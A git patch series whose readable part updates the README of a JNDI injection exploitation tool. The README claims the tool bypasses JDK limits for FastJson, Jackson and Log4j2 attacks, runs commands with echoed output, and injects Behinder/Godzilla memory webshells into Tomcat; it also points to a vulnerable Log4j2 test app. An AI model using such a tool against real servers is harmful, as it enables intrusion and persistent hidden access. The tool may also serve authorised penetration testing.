zqh5{nYSgDuzeW!dmA*}jmT0ukr;P6dt=s4!(0-Wq<9TB9FUf2EN3yW5gaiVd<4|}}
z&O*-O2KOsAOMVL*@nPYs6_vd-vjXOEnHBw1>7qk4Hs`B{yk?a+kLs%)GQ<9o88v%I
zcVJg<1{%yW0lo*wZO-b)Pvj&^@z2{&bJU01{y57;RTaH-w!##Z1-(@nz{~|w1RV2h
z#K;68*H8HQ!<kc!p(+Kx=>kIm7Lb^o1u*8cr$EM_*K-e4zm7gmH^Tfq^gO+og<J!S
zN^~(mP=~&HT22kLidN7XT8R~nh%RfWi!PySX)V?_gF+Kx)H+bPjGm;+>1nzG^galR
zE%Y*NP`Y0T{eFrj(GMJOy_yBrtMo%U2s^AoO!yIi<O21Zq4%3$lXU>ZV`$mnT1EN>
z0BZn~T?$}_op)bL{_X)<LSB1j284aY0N>=dXc1l#W^mhNgTPe)HUffYfr0tG6x>1O
z@Z8$$|MeAB?%9YT5>2Z-XiY^(?V&y9xqY+%gXTi_!*pIREvm$OaW5^&%r%!DH()Q_
zR$uuj73`p-icLZn*Z_0${9d}Cp&FK4R&94(2wFjp*mk~o5e6k($Z&<_l}-%X6w4bF
zG-cXIOua$RZm2du?X(f*-3C8@2=9mK8TvEccGTH`$WPP;KW|5?gHEL=!tzF}iXql_
z0uXVGd;~oS#FH*c(v_f;MjYuzqS}nia1~<97DSD$pnn}WYy*dDz~e*UaxMK8aY{0Z
zM5GDGGe4mxVED5U%buj4qICmWKck;RnjJKaegWusK(B<JLZ26urYj)1!Fx0P5|EPI
z^K2GU&pMEjh%|@1fo-t$008FBU}2v^!2q`9$#!9m>U{@rV7WE~QG_FY2?4SIgq{*h
z^b@LtI>6$^didLX^Ws56;TvXnIb$Um$yh0Cq*sDI%hyW{l1V^L@23?mvV4+ER%Uuu
zp+`gTS?z*Ajm?&3`S#M9pl<1&hpDew!iC=0PitM&gsy&SLKG1K^UZabaHQF7HaG62
z^^eiS3YEU}y>uxin3wg@<p=1BUTQHvcwZeb9=Z?vB&GU&P_!s(7P$uC5d}&qf7j?m
zjb75|W%YbT<4qd9Ml=A$z=`fx+EO`cJ&nWSPXH}9QV|Lk3-+1<9F!vyorSydAY6DE
z?#k<NRlW{oN(&<PMkqIl)z<+BUx4Lqfz$7XwfCX*IC8@i$O})RC=iqg4*jtBujw}s
zxd`_EE&UEsSP<fAg_3e)wBOSofReL7=NW~PWe84xq(8x@>%ryE^cNWNI<)_a;G~1L
zmtFvJL<LVd$jOu=`{<)`#fUM<M}1I^#Dy{rdMXdmDV0?Sw~K-vuIm|iGw6jTH=y;R
z<q>^qNY^D<H#$Qh=XMZ~G<zpRzYF8{V8-20*)AmWd!VR$)g~oEj)PE{^jnsNa~V|l
zQzd8_{S&Gbu$R#r^d{)KvHoB5Zzn>IBKJ{2`F~ad%>`hNTTvUv^funIizQrN@hH8t
zg9<AS&`b3_G?N>UcjgOj578vcgZ*4kkFE9$yaD_oxNMO2^HmaVBtu;&+nfU1R>D>`
zY$lNBD2)Y5-X%?A1mh#C!2ca8ROkqzmLyopMGrutJy5`2B$z%}??KRch)#z+%jp2<
z?MHp{2rPI2b<9E3EkDXCrdp{_>XKskzHHcy^;48$JhCh0@o1p+HdKTRL5t`e;J}qF
zGR3O6qs5rG^+lj16>oGOwW2PI1U=P<XpVcXx71s`e<#hXF7?h9Z$$xsY7b6}l+f0M
zO3m`Hw6=S>XW%zdFU+s9Ja&L@KR_MX|KWq;|CIpClKX%b+uK?xl10aC6x4+DQve?v
z1;CF7C?~_xry}&7iJ&(ReG35j%K`TY0N)O<XM*Nr6z1<jNj@3_r5%G)dO-)j2Q!XT
zSfMK=d9lW&LZv7vnnhI936Rp4K~xlodcrYiC3)YaF&ex0C{5Mq@DcJIk;-nyV7x>@
zS8GQAm)yjI4YcZc7CJ@d;Abi-%_t*v?xl?l<|a3k0R6@Ks59s><2j#ZVo03CybBMo
zE9i62)k+chdZ}wCf8O$yBEVfKG4K#y3v=j-Tyh6@S-P1*U<(#l1!h_re)rtM(n8DM
zN8LMlmE|uj?4!*=!!pdPWO$S{%G@H2(eAlLrA5|gHSaWQbZL>y8&heGF}Gs8m$vO-
z-#&H;Hkz=TtDW5h$68~}i-m$|ndUXpD8?GqC~?m%EiJW5geI-CN=i$G=C~?roO!LH
zS+s*{tpW&de#on0wKWDGjm;jjuTf&kcxyb|>^f__Re<rs&2DQ92CFc(q-lF80C&61
zp;&Qfw~F&|_<+sf!@l7hn!V=X;cPHzkWI4}lFIG}8Gd<t5%(N>dV3+BySC$Rl#XqZ
zBcAemUPQ(K4it8^e^?dycpi~-0q97km`_F~!2&QjgX#m{ht;$h0Gpf`j-xR+ZLlSD
z8)@9hFUT&n8{l}9@Yk9^wbyl&+R+m4d7lz^Pi|-4k+lQ%Dn9N+^dsac1379UvQz*W
z>TFaqi|9FItLIT<zkmwt@2Id|L>2WiYNJ<>OJ7B<d<_TR*O5N{iD>!;O6E5aJpP3&
z_;0NI4@Uos|Nh5r{4QnCyL<{A<9Rf|3lJn$qkkQKKZ~%J<Lu*WSmWDR=i9k}e~A9a
z>2>}Yz0AL+=kR-_DPf0wIOWcxiR=aa@t|0To`W=wZ==)gK5+gA3WI})@XyintfOT@
zif6b0tzyXXOZKBxB5|1uVZ~C8)1@{Q>f^DXc@W|34%}Fb!e|kF4u8ly8h!Zbj^}a_
zTBB$u{!n-fTBGS&>|iYB71EX53K<U~0B++;xfm@!t>x>u1TCGG^35thBHHsanGlH9
zA2A9npe0u*E|MRNOVQ`X9v|g#(4~h0_yeBts+w5DxAFu8SNq&5mlpeQL4n`v?a1d^
zh{%UBk*8Ox8c~Ia`YQEmaKea6F_z^)kZWtIs2&WEJp(VP#3R|ZYbX7w!t#`Q5%A29
zWP*-LL<dmNnIFw`p@e*ld_8oxQ~h0!fes{{Llkv-wmbD;pVWhgXth*<*CSIMMo>OL
zeG*O|Bi;NM&V!a7)MZ$fNIcN7WTPB2T^45b)5qOXWSTc*nfDA_Z+;>tj;ji^my$cE
zWcbAO9MpOS)~JN3&Yn1b;Fg1@a9Os3m`kIM(Im%F*<~GtZr`PV({YrRBDgHZzauoO
z{2lV*f4M_o<v;4I0?Qe&SuyM}jVIC!yyx;%*nS$2PzIFY1jA=goM!+n75E{zl6G+w
z^>a1-glp(`9H1BQH|NZ=*yK5|^i;?f<T9Smr}4Sjw7ZLHLH#D6DoXeAB%noufBt|c
zqvb=id)`UKlMw%=s8kF@WHC2gUFPA(Bc6a-_8^c`3<L`f-8of?3*JLOFw<*%7yZpw
LfPKhi*tGux;40;;

literal 0
HcmV?d00001


From 336bf32aa4901a038d724320eebd067fda86ef41 Mon Sep 17 00:00:00 2001
From: SearchNull <43846937@qq.com>
Date: Wed, 19 Jan 2022 14:50:10 +0800
Subject: [PATCH 2/3] Update README.md

---
 README.md | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 3de2402..4d7196b 100644
--- a/README.md
+++ b/README.md
@@ -6,6 +6,13 @@
 > 
 > Solve the high version of JDK Bypass, like FastJson, Jackson, Log4j2, native JNDI injection vulnerabilities, and detect locally available deserialization gadgets to achieve command execution, echo command execution, and memory shell injection
 
+## Support
+
+- 本地gadget探测
+- 回显命令执行
+- Tomcat中间件注入冰蝎/哥斯拉流量加密Webshell内存马
+- Tomcat/Resin 一句话内存马
+
 ## Usage
 
 ```shell
@@ -92,7 +99,7 @@ java -jar JNDI-Inject-Exploit-0.1-all.jar ip="192.168.0.104" url="http://192.168
 
 ![](https://searchnull-image.oss-cn-shenzhen.aliyuncs.com/20211226142236.png)
 
-**可利用Gadget信息，如名称中带有 `[TomcatEcho]` 等字样则表示该Gadget可利用且能够回显命令执行，如名称中带有 `BehinderFilter` 、`GodzillaFilter` 字样则表示支持注入冰蝎内存马或哥斯拉内存马**
+**可利用Gadget信息，如名称中带有 `[TomcatEcho]` 等字样则表示该Gadget可利用且能够回显命令执行，如名称中带有 `TomcatBehinderFilter` 、`TomcatGodzillaFilter` 字样则表示支持在Tomcat中间件中注入冰蝎内存马或哥斯拉内存马（支持该功能不代表一定能够注入成功）**
 
 ![](https://searchnull-image.oss-cn-shenzhen.aliyuncs.com/20211226142317.png)
 

From 4c0f310c8ed2ccba1c8715509aca00410bf06467 Mon Sep 17 00:00:00 2001
From: SearchNull <43846937@qq.com>
Date: Wed, 19 Jan 2022 15:08:35 +0800
Subject: [PATCH 3/3] Update README.md

---
 README.md | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/README.md b/README.md
index 4d7196b..ec9834a 100644
--- a/README.md
+++ b/README.md
@@ -13,6 +13,12 @@
 - Tomcat中间件注入冰蝎/哥斯拉流量加密Webshell内存马
 - Tomcat/Resin 一句话内存马
 
+## Test
+
+漏洞环境请转至 v0.3 Version Releases处下载，运行 `springWithLog4j-1.0-SNAPSHOT.jar` 会在8190端口运行服务，访问首页的超链接后的id参数中存在 `Log4j2`漏洞。
+
+![](https://searchnull-image.oss-cn-shenzhen.aliyuncs.com/20220119150756.png)
+
 ## Usage
 
 ```shell